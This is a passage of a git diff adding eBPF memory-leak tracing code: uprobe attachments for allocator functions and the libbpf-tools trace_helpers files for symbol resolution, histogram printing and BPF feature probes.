ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, free, free_enter); + ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); + + // the following probes are intentinally allowed to fail attachment + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, valloc, valloc_enter); + ATTACH_URETPROBE(skel, valloc, valloc_exit); + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, pvalloc, pvalloc_enter); + ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit); + + // added in C11 + ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter); + ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit); + + return 0; +} diff --git a/16-memleak/trace_helpers.c b/16-memleak/trace_helpers.c new file mode 100644 index 0000000..89c4835 --- /dev/null +++ b/16-memleak/trace_helpers.c @@ -0,0 +1,1202 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +// Copyright (c) 2020 Wenbo Zhang +// +// Based on ksyms improvements from Andrii Nakryiko, add more helpers. +// 28-Feb-2020 Wenbo Zhang Created this. 
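
The `attach_uprobes()` function above relies on `ATTACH_UPROBE`/`ATTACH_URETPROBE` macros whose definitions live earlier in memleak.c and are not shown in this diff. As a rough sketch of how such macros are typically built on libbpf (an assumption, not the verbatim definition — `env.pid` and `env.object`, the target PID and the path of the traced binary such as libc, are assumed fields of memleak's option struct):

```c
/* Illustrative sketch of an ATTACH_UPROBE-style macro (assumption; the real
 * definition in memleak.c may differ). It attaches one BPF program as a
 * uprobe or uretprobe on a symbol, letting libbpf resolve the offset from
 * the function name. */
#define __ATTACH_UPROBE(skel, sym_name, prog_name, is_retprobe)           \
	do {                                                              \
		LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts,                 \
			    .func_name = #sym_name,                       \
			    .retprobe = is_retprobe);                     \
		skel->links.prog_name = bpf_program__attach_uprobe_opts( \
			skel->progs.prog_name, env.pid, env.object,       \
			0 /* offset resolved from func_name */,           \
			&uprobe_opts);                                    \
	} while (false)

/* The *_CHECKED variants additionally treat a failed attach as fatal: */
#define ATTACH_UPROBE_CHECKED(skel, sym, prog)                            \
	do {                                                              \
		__ATTACH_UPROBE(skel, sym, prog, false);                  \
		if (!skel->links.prog)                                    \
			return -errno;                                    \
	} while (false)
```

The plain (unchecked) variants are used for symbols such as `valloc` or `aligned_alloc` that may simply be absent from the target libc, so a failed attach there is tolerated.
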
+#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "trace_helpers.h" +#include "uprobe_helpers.h" + +#define min(x, y) ({ \ + typeof(x) _min1 = (x); \ + typeof(y) _min2 = (y); \ + (void) (&_min1 == &_min2); \ + _min1 < _min2 ? _min1 : _min2; }) + +#define DISK_NAME_LEN 32 + +#define MINORBITS 20 +#define MINORMASK ((1U << MINORBITS) - 1) + +#define MKDEV(ma, mi) (((ma) << MINORBITS) | (mi)) + +struct ksyms { + struct ksym *syms; + int syms_sz; + int syms_cap; + char *strs; + int strs_sz; + int strs_cap; +}; + +static int ksyms__add_symbol(struct ksyms *ksyms, const char *name, unsigned long addr) +{ + size_t new_cap, name_len = strlen(name) + 1; + struct ksym *ksym; + void *tmp; + + if (ksyms->strs_sz + name_len > ksyms->strs_cap) { + new_cap = ksyms->strs_cap * 4 / 3; + if (new_cap < ksyms->strs_sz + name_len) + new_cap = ksyms->strs_sz + name_len; + if (new_cap < 1024) + new_cap = 1024; + tmp = realloc(ksyms->strs, new_cap); + if (!tmp) + return -1; + ksyms->strs = tmp; + ksyms->strs_cap = new_cap; + } + if (ksyms->syms_sz + 1 > ksyms->syms_cap) { + new_cap = ksyms->syms_cap * 4 / 3; + if (new_cap < 1024) + new_cap = 1024; + tmp = realloc(ksyms->syms, sizeof(*ksyms->syms) * new_cap); + if (!tmp) + return -1; + ksyms->syms = tmp; + ksyms->syms_cap = new_cap; + } + + ksym = &ksyms->syms[ksyms->syms_sz]; + /* while constructing, re-use pointer as just a plain offset */ + ksym->name = (void *)(unsigned long)ksyms->strs_sz; + ksym->addr = addr; + + memcpy(ksyms->strs + ksyms->strs_sz, name, name_len); + ksyms->strs_sz += name_len; + ksyms->syms_sz++; + + return 0; +} + +static int ksym_cmp(const void *p1, const void *p2) +{ + const struct ksym *s1 = p1, *s2 = p2; + + if (s1->addr == s2->addr) + return strcmp(s1->name, s2->name); + return s1->addr < s2->addr ? 
-1 : 1; +} + +struct ksyms *ksyms__load(void) +{ + char sym_type, sym_name[256]; + struct ksyms *ksyms; + unsigned long sym_addr; + int i, ret; + FILE *f; + + f = fopen("/proc/kallsyms", "r"); + if (!f) + return NULL; + + ksyms = calloc(1, sizeof(*ksyms)); + if (!ksyms) + goto err_out; + + while (true) { + ret = fscanf(f, "%lx %c %s%*[^\n]\n", + &sym_addr, &sym_type, sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 3) + goto err_out; + if (ksyms__add_symbol(ksyms, sym_name, sym_addr)) + goto err_out; + } + + /* now when strings are finalized, adjust pointers properly */ + for (i = 0; i < ksyms->syms_sz; i++) + ksyms->syms[i].name += (unsigned long)ksyms->strs; + + qsort(ksyms->syms, ksyms->syms_sz, sizeof(*ksyms->syms), ksym_cmp); + + fclose(f); + return ksyms; + +err_out: + ksyms__free(ksyms); + fclose(f); + return NULL; +} + +void ksyms__free(struct ksyms *ksyms) +{ + if (!ksyms) + return; + + free(ksyms->syms); + free(ksyms->strs); + free(ksyms); +} + +const struct ksym *ksyms__map_addr(const struct ksyms *ksyms, + unsigned long addr) +{ + int start = 0, end = ksyms->syms_sz - 1, mid; + unsigned long sym_addr; + + /* find largest sym_addr <= addr using binary search */ + while (start < end) { + mid = start + (end - start + 1) / 2; + sym_addr = ksyms->syms[mid].addr; + + if (sym_addr <= addr) + start = mid; + else + end = mid - 1; + } + + if (start == end && ksyms->syms[start].addr <= addr) + return &ksyms->syms[start]; + return NULL; +} + +const struct ksym *ksyms__get_symbol(const struct ksyms *ksyms, + const char *name) +{ + int i; + + for (i = 0; i < ksyms->syms_sz; i++) { + if (strcmp(ksyms->syms[i].name, name) == 0) + return &ksyms->syms[i]; + } + + return NULL; +} + +struct load_range { + uint64_t start; + uint64_t end; + uint64_t file_off; +}; + +enum elf_type { + EXEC, + DYN, + PERF_MAP, + VDSO, + UNKNOWN, +}; + +struct dso { + char *name; + struct load_range *ranges; + int range_sz; + /* Dyn's first text section virtual addr at execution */ + uint64_t sh_addr; + /* Dyn's first text section file offset */ + uint64_t sh_offset; + enum elf_type type; + + struct sym *syms; + int syms_sz; + int syms_cap; + + /* + * libbpf's struct btf is actually a pretty efficient + * "set of strings" data structure, so we create an + * empty one and use it to store symbol names. 
+ */ + struct btf *btf; +}; + +struct map { + uint64_t start_addr; + uint64_t end_addr; + uint64_t file_off; + uint64_t dev_major; + uint64_t dev_minor; + uint64_t inode; +}; + +struct syms { + struct dso *dsos; + int dso_sz; +}; + +static bool is_file_backed(const char *mapname) +{ +#define STARTS_WITH(mapname, prefix) \ + (!strncmp(mapname, prefix, sizeof(prefix) - 1)) + + return mapname[0] && !( + STARTS_WITH(mapname, "//anon") || + STARTS_WITH(mapname, "/dev/zero") || + STARTS_WITH(mapname, "/anon_hugepage") || + STARTS_WITH(mapname, "[stack") || + STARTS_WITH(mapname, "/SYSV") || + STARTS_WITH(mapname, "[heap]") || + STARTS_WITH(mapname, "[vsyscall]")); +} + +static bool is_perf_map(const char *path) +{ + return false; +} + +static bool is_vdso(const char *path) +{ + return !strcmp(path, "[vdso]"); +} + +static int get_elf_type(const char *path) +{ + GElf_Ehdr hdr; + void *res; + Elf *e; + int fd; + + if (is_vdso(path)) + return -1; + e = open_elf(path, &fd); + if (!e) + return -1; + res = gelf_getehdr(e, &hdr); + close_elf(e, fd); + if (!res) + return -1; + return hdr.e_type; +} + +static int get_elf_text_scn_info(const char *path, uint64_t *addr, + uint64_t *offset) +{ + Elf_Scn *section = NULL; + int fd = -1, err = -1; + GElf_Shdr header; + size_t stridx; + Elf *e = NULL; + char *name; + + e = open_elf(path, &fd); + if (!e) + goto err_out; + err = elf_getshdrstrndx(e, &stridx); + if (err < 0) + goto err_out; + + err = -1; + while ((section = elf_nextscn(e, section)) != 0) { + if (!gelf_getshdr(section, &header)) + continue; + + name = elf_strptr(e, stridx, header.sh_name); + if (name && !strcmp(name, ".text")) { + *addr = (uint64_t)header.sh_addr; + *offset = (uint64_t)header.sh_offset; + err = 0; + break; + } + } + +err_out: + close_elf(e, fd); + return err; +} + +static int syms__add_dso(struct syms *syms, struct map *map, const char *name) +{ + struct dso *dso = NULL; + int i, type; + void *tmp; + + for (i = 0; i < syms->dso_sz; i++) { + if (!strcmp(syms->dsos[i].name, name)) { + dso = &syms->dsos[i]; + break; + } + } + + if (!dso) { + tmp = realloc(syms->dsos, (syms->dso_sz + 1) * + sizeof(*syms->dsos)); + if (!tmp) + return -1; + syms->dsos = tmp; + dso = &syms->dsos[syms->dso_sz++]; + memset(dso, 0, sizeof(*dso)); + dso->name = strdup(name); + dso->btf = btf__new_empty(); + } + + tmp = realloc(dso->ranges, (dso->range_sz + 1) * sizeof(*dso->ranges)); + if (!tmp) + return -1; + dso->ranges = tmp; + dso->ranges[dso->range_sz].start = map->start_addr; + dso->ranges[dso->range_sz].end = map->end_addr; + dso->ranges[dso->range_sz].file_off = map->file_off; + dso->range_sz++; + type = get_elf_type(name); + if (type == ET_EXEC) { + dso->type = EXEC; + } else if (type == ET_DYN) { + dso->type = DYN; + if (get_elf_text_scn_info(name, &dso->sh_addr, &dso->sh_offset) < 0) + return -1; + } else if (is_perf_map(name)) { + dso->type = PERF_MAP; + } else if (is_vdso(name)) { + dso->type = VDSO; + } else { + dso->type = UNKNOWN; + } + return 0; +} + +static struct dso *syms__find_dso(const struct syms *syms, unsigned long addr, + uint64_t *offset) +{ + struct load_range *range; + struct dso *dso; + int i, j; + + for (i = 0; i < syms->dso_sz; i++) { + dso = &syms->dsos[i]; + for (j = 0; j < dso->range_sz; j++) { + range = &dso->ranges[j]; + if (addr <= range->start || addr >= range->end) + continue; + if (dso->type == DYN || dso->type == VDSO) { + /* Offset within the mmap */ + *offset = addr - range->start + range->file_off; + /* Offset within the ELF for dyn symbol lookup */ + *offset += 
dso->sh_addr - dso->sh_offset; + } else { + *offset = addr; + } + + return dso; + } + } + + return NULL; +} + +static int dso__load_sym_table_from_perf_map(struct dso *dso) +{ + return -1; +} + +static int dso__add_sym(struct dso *dso, const char *name, uint64_t start, + uint64_t size) +{ + struct sym *sym; + size_t new_cap; + void *tmp; + int off; + + off = btf__add_str(dso->btf, name); + if (off < 0) + return off; + + if (dso->syms_sz + 1 > dso->syms_cap) { + new_cap = dso->syms_cap * 4 / 3; + if (new_cap < 1024) + new_cap = 1024; + tmp = realloc(dso->syms, sizeof(*dso->syms) * new_cap); + if (!tmp) + return -1; + dso->syms = tmp; + dso->syms_cap = new_cap; + } + + sym = &dso->syms[dso->syms_sz++]; + /* while constructing, re-use pointer as just a plain offset */ + sym->name = (void*)(unsigned long)off; + sym->start = start; + sym->size = size; + sym->offset = 0; + + return 0; +} + +static int sym_cmp(const void *p1, const void *p2) +{ + const struct sym *s1 = p1, *s2 = p2; + + if (s1->start == s2->start) + return strcmp(s1->name, s2->name); + return s1->start < s2->start ? -1 : 1; +} + +static int dso__add_syms(struct dso *dso, Elf *e, Elf_Scn *section, + size_t stridx, size_t symsize) +{ + Elf_Data *data = NULL; + + while ((data = elf_getdata(section, data)) != 0) { + size_t i, symcount = data->d_size / symsize; + + if (data->d_size % symsize) + return -1; + + for (i = 0; i < symcount; ++i) { + const char *name; + GElf_Sym sym; + + if (!gelf_getsym(data, (int)i, &sym)) + continue; + if (!(name = elf_strptr(e, stridx, sym.st_name))) + continue; + if (name[0] == '\0') + continue; + + if (sym.st_value == 0) + continue; + + if (dso__add_sym(dso, name, sym.st_value, sym.st_size)) + goto err_out; + } + } + + return 0; + +err_out: + return -1; +} + +static void dso__free_fields(struct dso *dso) +{ + if (!dso) + return; + + free(dso->name); + free(dso->ranges); + free(dso->syms); + btf__free(dso->btf); +} + +static int dso__load_sym_table_from_elf(struct dso *dso, int fd) +{ + Elf_Scn *section = NULL; + Elf *e; + int i; + + e = fd > 0 ? 
open_elf_by_fd(fd) : open_elf(dso->name, &fd); + if (!e) + return -1; + + while ((section = elf_nextscn(e, section)) != 0) { + GElf_Shdr header; + + if (!gelf_getshdr(section, &header)) + continue; + + if (header.sh_type != SHT_SYMTAB && + header.sh_type != SHT_DYNSYM) + continue; + + if (dso__add_syms(dso, e, section, header.sh_link, + header.sh_entsize)) + goto err_out; + } + + /* now when strings are finalized, adjust pointers properly */ + for (i = 0; i < dso->syms_sz; i++) + dso->syms[i].name = + btf__name_by_offset(dso->btf, + (unsigned long)dso->syms[i].name); + + qsort(dso->syms, dso->syms_sz, sizeof(*dso->syms), sym_cmp); + + close_elf(e, fd); + return 0; + +err_out: + dso__free_fields(dso); + close_elf(e, fd); + return -1; +} + +static int create_tmp_vdso_image(struct dso *dso) +{ + uint64_t start_addr, end_addr; + long pid = getpid(); + char buf[PATH_MAX]; + void *image = NULL; + char tmpfile[128]; + int ret, fd = -1; + uint64_t sz; + char *name; + FILE *f; + + snprintf(tmpfile, sizeof(tmpfile), "/proc/%ld/maps", pid); + f = fopen(tmpfile, "r"); + if (!f) + return -1; + + while (true) { + ret = fscanf(f, "%lx-%lx %*s %*x %*x:%*x %*u%[^\n]", + &start_addr, &end_addr, buf); + if (ret == EOF && feof(f)) + break; + if (ret != 3) + goto err_out; + + name = buf; + while (isspace(*name)) + name++; + if (!is_file_backed(name)) + continue; + if (is_vdso(name)) + break; + } + + sz = end_addr - start_addr; + image = malloc(sz); + if (!image) + goto err_out; + memcpy(image, (void *)start_addr, sz); + + snprintf(tmpfile, sizeof(tmpfile), + "/tmp/libbpf_%ld_vdso_image_XXXXXX", pid); + fd = mkostemp(tmpfile, O_CLOEXEC); + if (fd < 0) { + fprintf(stderr, "failed to create temp file: %s\n", + strerror(errno)); + goto err_out; + } + /* Unlink the file to avoid leaking */ + if (unlink(tmpfile) == -1) + fprintf(stderr, "failed to unlink %s: %s\n", tmpfile, + strerror(errno)); + if (write(fd, image, sz) == -1) { + fprintf(stderr, "failed to write to vDSO image: %s\n", + strerror(errno)); + close(fd); + fd = -1; + goto err_out; + } + +err_out: + fclose(f); + free(image); + return fd; +} + +static int dso__load_sym_table_from_vdso_image(struct dso *dso) +{ + int fd = create_tmp_vdso_image(dso); + + if (fd < 0) + return -1; + return dso__load_sym_table_from_elf(dso, fd); +} + +static int dso__load_sym_table(struct dso *dso) +{ + if (dso->type == UNKNOWN) + return -1; + if (dso->type == PERF_MAP) + return dso__load_sym_table_from_perf_map(dso); + if (dso->type == EXEC || dso->type == DYN) + return dso__load_sym_table_from_elf(dso, 0); + if (dso->type == VDSO) + return dso__load_sym_table_from_vdso_image(dso); + return -1; +} + +static struct sym *dso__find_sym(struct dso *dso, uint64_t offset) +{ + unsigned long sym_addr; + int start, end, mid; + + if (!dso->syms && dso__load_sym_table(dso)) + return NULL; + + start = 0; + end = dso->syms_sz - 1; + + /* find largest sym_addr <= addr using binary search */ + while (start < end) { + mid = start + (end - start + 1) / 2; + sym_addr = dso->syms[mid].start; + + if (sym_addr <= offset) + start = mid; + else + end = mid - 1; + } + + if (start == end && dso->syms[start].start <= offset) { + (dso->syms[start]).offset = offset - dso->syms[start].start; + return &dso->syms[start]; + } + return NULL; +} + +struct syms *syms__load_file(const char *fname) +{ + char buf[PATH_MAX], perm[5]; + struct syms *syms; + struct map map; + char *name; + FILE *f; + int ret; + + f = fopen(fname, "r"); + if (!f) + return NULL; + + syms = calloc(1, sizeof(*syms)); + if (!syms) + 
goto err_out; + + while (true) { + ret = fscanf(f, "%lx-%lx %4s %lx %lx:%lx %lu%[^\n]", + &map.start_addr, &map.end_addr, perm, + &map.file_off, &map.dev_major, + &map.dev_minor, &map.inode, buf); + if (ret == EOF && feof(f)) + break; + if (ret != 8) /* perf-.map */ + goto err_out; + + if (perm[2] != 'x') + continue; + + name = buf; + while (isspace(*name)) + name++; + if (!is_file_backed(name)) + continue; + + if (syms__add_dso(syms, &map, name)) + goto err_out; + } + + fclose(f); + return syms; + +err_out: + syms__free(syms); + fclose(f); + return NULL; +} + +struct syms *syms__load_pid(pid_t tgid) +{ + char fname[128]; + + snprintf(fname, sizeof(fname), "/proc/%ld/maps", (long)tgid); + return syms__load_file(fname); +} + +void syms__free(struct syms *syms) +{ + int i; + + if (!syms) + return; + + for (i = 0; i < syms->dso_sz; i++) + dso__free_fields(&syms->dsos[i]); + free(syms->dsos); + free(syms); +} + +const struct sym *syms__map_addr(const struct syms *syms, unsigned long addr) +{ + struct dso *dso; + uint64_t offset; + + dso = syms__find_dso(syms, addr, &offset); + if (!dso) + return NULL; + return dso__find_sym(dso, offset); +} + +const struct sym *syms__map_addr_dso(const struct syms *syms, unsigned long addr, + char **dso_name, unsigned long *dso_offset) +{ + struct dso *dso; + uint64_t offset; + + dso = syms__find_dso(syms, addr, &offset); + if (!dso) + return NULL; + + *dso_name = dso->name; + *dso_offset = offset; + + return dso__find_sym(dso, offset); +} + +struct syms_cache { + struct { + struct syms *syms; + int tgid; + } *data; + int nr; +}; + +struct syms_cache *syms_cache__new(int nr) +{ + struct syms_cache *syms_cache; + + syms_cache = calloc(1, sizeof(*syms_cache)); + if (!syms_cache) + return NULL; + if (nr > 0) + syms_cache->data = calloc(nr, sizeof(*syms_cache->data)); + return syms_cache; +} + +void syms_cache__free(struct syms_cache *syms_cache) +{ + int i; + + if (!syms_cache) + return; + + for (i = 0; i < syms_cache->nr; i++) + syms__free(syms_cache->data[i].syms); + free(syms_cache->data); + free(syms_cache); +} + +struct syms *syms_cache__get_syms(struct syms_cache *syms_cache, int tgid) +{ + void *tmp; + int i; + + for (i = 0; i < syms_cache->nr; i++) { + if (syms_cache->data[i].tgid == tgid) + return syms_cache->data[i].syms; + } + + tmp = realloc(syms_cache->data, (syms_cache->nr + 1) * + sizeof(*syms_cache->data)); + if (!tmp) + return NULL; + syms_cache->data = tmp; + syms_cache->data[syms_cache->nr].syms = syms__load_pid(tgid); + syms_cache->data[syms_cache->nr].tgid = tgid; + return syms_cache->data[syms_cache->nr++].syms; +} + +struct partitions { + struct partition *items; + int sz; +}; + +static int partitions__add_partition(struct partitions *partitions, + const char *name, unsigned int dev) +{ + struct partition *partition; + void *tmp; + + tmp = realloc(partitions->items, (partitions->sz + 1) * + sizeof(*partitions->items)); + if (!tmp) + return -1; + partitions->items = tmp; + partition = &partitions->items[partitions->sz]; + partition->name = strdup(name); + partition->dev = dev; + partitions->sz++; + + return 0; +} + +struct partitions *partitions__load(void) +{ + char part_name[DISK_NAME_LEN]; + unsigned int devmaj, devmin; + unsigned long long nop; + struct partitions *partitions; + char buf[64]; + FILE *f; + + f = fopen("/proc/partitions", "r"); + if (!f) + return NULL; + + partitions = calloc(1, sizeof(*partitions)); + if (!partitions) + goto err_out; + + while (fgets(buf, sizeof(buf), f) != NULL) { + /* skip heading */ + if (buf[0] != ' ' 
|| buf[0] == '\n') + continue; + if (sscanf(buf, "%u %u %llu %s", &devmaj, &devmin, &nop, + part_name) != 4) + goto err_out; + if (partitions__add_partition(partitions, part_name, + MKDEV(devmaj, devmin))) + goto err_out; + } + + fclose(f); + return partitions; + +err_out: + partitions__free(partitions); + fclose(f); + return NULL; +} + +void partitions__free(struct partitions *partitions) +{ + int i; + + if (!partitions) + return; + + for (i = 0; i < partitions->sz; i++) + free(partitions->items[i].name); + free(partitions->items); + free(partitions); +} + +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (partitions->items[i].dev == dev) + return &partitions->items[i]; + } + + return NULL; +} + +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (strcmp(partitions->items[i].name, name) == 0) + return &partitions->items[i]; + } + + return NULL; +} + +static void print_stars(unsigned int val, unsigned int val_max, int width) +{ + int num_stars, num_spaces, i; + bool need_plus; + + num_stars = min(val, val_max) * width / val_max; + num_spaces = width - num_stars; + need_plus = val > val_max; + + for (i = 0; i < num_stars; i++) + printf("*"); + for (i = 0; i < num_spaces; i++) + printf(" "); + if (need_plus) + printf("+"); +} + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type) +{ + int stars_max = 40, idx_max = -1; + unsigned int val, val_max = 0; + unsigned long long low, high; + int stars, width, i; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) + idx_max = i; + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf("%*s%-*s : count distribution\n", idx_max <= 32 ? 5 : 15, "", + idx_max <= 32 ? 19 : 29, val_type); + + if (idx_max <= 32) + stars = stars_max; + else + stars = stars_max / 2; + + for (i = 0; i <= idx_max; i++) { + low = (1ULL << (i + 1)) >> 1; + high = (1ULL << (i + 1)) - 1; + if (low == high) + low -= 1; + val = vals[i]; + width = idx_max <= 32 ? 
10 : 20; + printf("%*lld -> %-*lld : %-8d |", width, low, width, high, val); + print_stars(val, val_max, stars); + printf("|\n"); + } +} + +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type) +{ + int i, stars_max = 40, idx_min = -1, idx_max = -1; + unsigned int val, val_max = 0; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) { + idx_max = i; + if (idx_min < 0) + idx_min = i; + } + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf(" %-13s : count distribution\n", val_type); + for (i = idx_min; i <= idx_max; i++) { + val = vals[i]; + if (!val) + continue; + printf(" %-10d : %-8d |", base + i * step, val); + print_stars(val, val_max, stars_max); + printf("|\n"); + } +} + +unsigned long long get_ktime_ns(void) +{ + struct timespec ts; + + clock_gettime(CLOCK_MONOTONIC, &ts); + return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec; +} + +bool is_kernel_module(const char *name) +{ + bool found = false; + char buf[64]; + FILE *f; + + f = fopen("/proc/modules", "r"); + if (!f) + return false; + + while (fgets(buf, sizeof(buf), f) != NULL) { + if (sscanf(buf, "%s %*s\n", buf) != 1) + break; + if (!strcmp(buf, name)) { + found = true; + break; + } + } + + fclose(f); + return found; +} + +static bool fentry_try_attach(int id) +{ + int prog_fd, attach_fd; + char error[4096]; + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + LIBBPF_OPTS(bpf_prog_load_opts, opts, + .expected_attach_type = BPF_TRACE_FENTRY, + .attach_btf_id = id, + .log_buf = error, + .log_size = sizeof(error), + ); + + prog_fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, "test", "GPL", insns, + sizeof(insns) / sizeof(struct bpf_insn), &opts); + if (prog_fd < 0) + return false; + + attach_fd = bpf_raw_tracepoint_open(NULL, prog_fd); + if (attach_fd >= 0) + close(attach_fd); + + close(prog_fd); + return attach_fd >= 0; +} + +bool fentry_can_attach(const char *name, const char *mod) +{ + struct btf *btf, *vmlinux_btf, *module_btf = NULL; + int err, id; + + vmlinux_btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(vmlinux_btf); + if (err) + return false; + + btf = vmlinux_btf; + + if (mod) { + module_btf = btf__load_module_btf(mod, vmlinux_btf); + err = libbpf_get_error(module_btf); + if (!err) + btf = module_btf; + } + + id = btf__find_by_name_kind(btf, name, BTF_KIND_FUNC); + + btf__free(module_btf); + btf__free(vmlinux_btf); + return id > 0 && fentry_try_attach(id); +} + +bool kprobe_exists(const char *name) +{ + char addr_range[256]; + char sym_name[256]; + FILE *f; + int ret; + + f = fopen("/sys/kernel/debug/kprobes/blacklist", "r"); + if (!f) + goto avail_filter; + + while (true) { + ret = fscanf(f, "%s %s%*[^\n]\n", addr_range, sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 2) { + fprintf(stderr, "failed to read symbol from kprobe blacklist\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return false; + } + } + fclose(f); + +avail_filter: + f = fopen("/sys/kernel/debug/tracing/available_filter_functions", "r"); + if (!f) + goto slow_path; + + while (true) { + ret = fscanf(f, "%s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from available_filter_functions\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; + +slow_path: + f = fopen("/proc/kallsyms", "r"); + 
if (!f) + return false; + + while (true) { + ret = fscanf(f, "%*x %*c %s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from kallsyms\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; +} + +bool tracepoint_exists(const char *category, const char *event) +{ + char path[PATH_MAX]; + + snprintf(path, sizeof(path), "/sys/kernel/debug/tracing/events/%s/%s/format", category, event); + if (!access(path, F_OK)) + return true; + return false; +} + +bool vmlinux_btf_exists(void) +{ + struct btf *btf; + int err; + + btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(btf); + if (err) + return false; + + btf__free(btf); + return true; +} + +bool module_btf_exists(const char *mod) +{ + char sysfs_mod[80]; + + if (mod) { + snprintf(sysfs_mod, sizeof(sysfs_mod), "/sys/kernel/btf/%s", mod); + if (!access(sysfs_mod, R_OK)) + return true; + } + return false; +} + +bool probe_tp_btf(const char *name) +{ + LIBBPF_OPTS(bpf_prog_load_opts, opts, .expected_attach_type = BPF_TRACE_RAW_TP); + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + int fd, insn_cnt = sizeof(insns) / sizeof(struct bpf_insn); + + opts.attach_btf_id = libbpf_find_vmlinux_btf_id(name, BPF_TRACE_RAW_TP); + fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, NULL, "GPL", insns, insn_cnt, &opts); + if (fd >= 0) + close(fd); + return fd >= 0; +} + +bool probe_ringbuf() +{ + int map_fd; + + map_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, NULL, 0, 0, getpagesize(), NULL); + if (map_fd < 0) + return false; + + close(map_fd); + return true; +} diff --git a/16-memleak/trace_helpers.h b/16-memleak/trace_helpers.h new file mode 100644 index 0000000..171bc4e --- /dev/null +++ b/16-memleak/trace_helpers.h @@ -0,0 +1,104 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#ifndef __TRACE_HELPERS_H +#define __TRACE_HELPERS_H + +#include + +#define NSEC_PER_SEC 1000000000ULL + +struct ksym { + const char *name; + unsigned long addr; +}; + +struct ksyms; + +struct ksyms *ksyms__load(void); +void ksyms__free(struct ksyms *ksyms); +const struct ksym *ksyms__map_addr(const struct ksyms *ksyms, + unsigned long addr); +const struct ksym *ksyms__get_symbol(const struct ksyms *ksyms, + const char *name); + +struct sym { + const char *name; + unsigned long start; + unsigned long size; + unsigned long offset; +}; + +struct syms; + +struct syms *syms__load_pid(int tgid); +struct syms *syms__load_file(const char *fname); +void syms__free(struct syms *syms); +const struct sym *syms__map_addr(const struct syms *syms, unsigned long addr); +const struct sym *syms__map_addr_dso(const struct syms *syms, unsigned long addr, + char **dso_name, unsigned long *dso_offset); + +struct syms_cache; + +struct syms_cache *syms_cache__new(int nr); +struct syms *syms_cache__get_syms(struct syms_cache *syms_cache, int tgid); +void syms_cache__free(struct syms_cache *syms_cache); + +struct partition { + char *name; + unsigned int dev; +}; + +struct partitions; + +struct partitions *partitions__load(void); +void partitions__free(struct partitions *partitions); +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev); +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name); + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type); +void 
print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type); + +unsigned long long get_ktime_ns(void); + +bool is_kernel_module(const char *name); + +/* + * When attempting to use kprobe/kretprobe, please check out new fentry/fexit + * probes, as they provide better performance and usability. But in some + * situations we have to fallback to kprobe/kretprobe probes. This helper + * is used to detect fentry/fexit support for the specified kernel function. + * + * 1. A gap between kernel versions, kernel BTF is exposed + * starting from 5.4 kernel. but fentry/fexit is actually + * supported starting from 5.5. + * 2. Whether kernel supports module BTF or not + * + * *name* is the name of a kernel function to be attached to, which can be + * from vmlinux or a kernel module. + * *mod* is a hint that indicates the *name* may reside in module BTF, + * if NULL, it means *name* belongs to vmlinux. + */ +bool fentry_can_attach(const char *name, const char *mod); + +/* + * The name of a kernel function to be attached to may be changed between + * kernel releases. This helper is used to confirm whether the target kernel + * uses a certain function name before attaching. + * + * It is achieved by scaning + * /sys/kernel/debug/tracing/available_filter_functions + * If this file does not exist, it fallbacks to parse /proc/kallsyms, + * which is slower. + */ +bool kprobe_exists(const char *name); +bool tracepoint_exists(const char *category, const char *event); + +bool vmlinux_btf_exists(void); +bool module_btf_exists(const char *mod); + +bool probe_tp_btf(const char *name); +bool probe_ringbuf(); + +#endif /* __TRACE_HELPERS_H */ diff --git 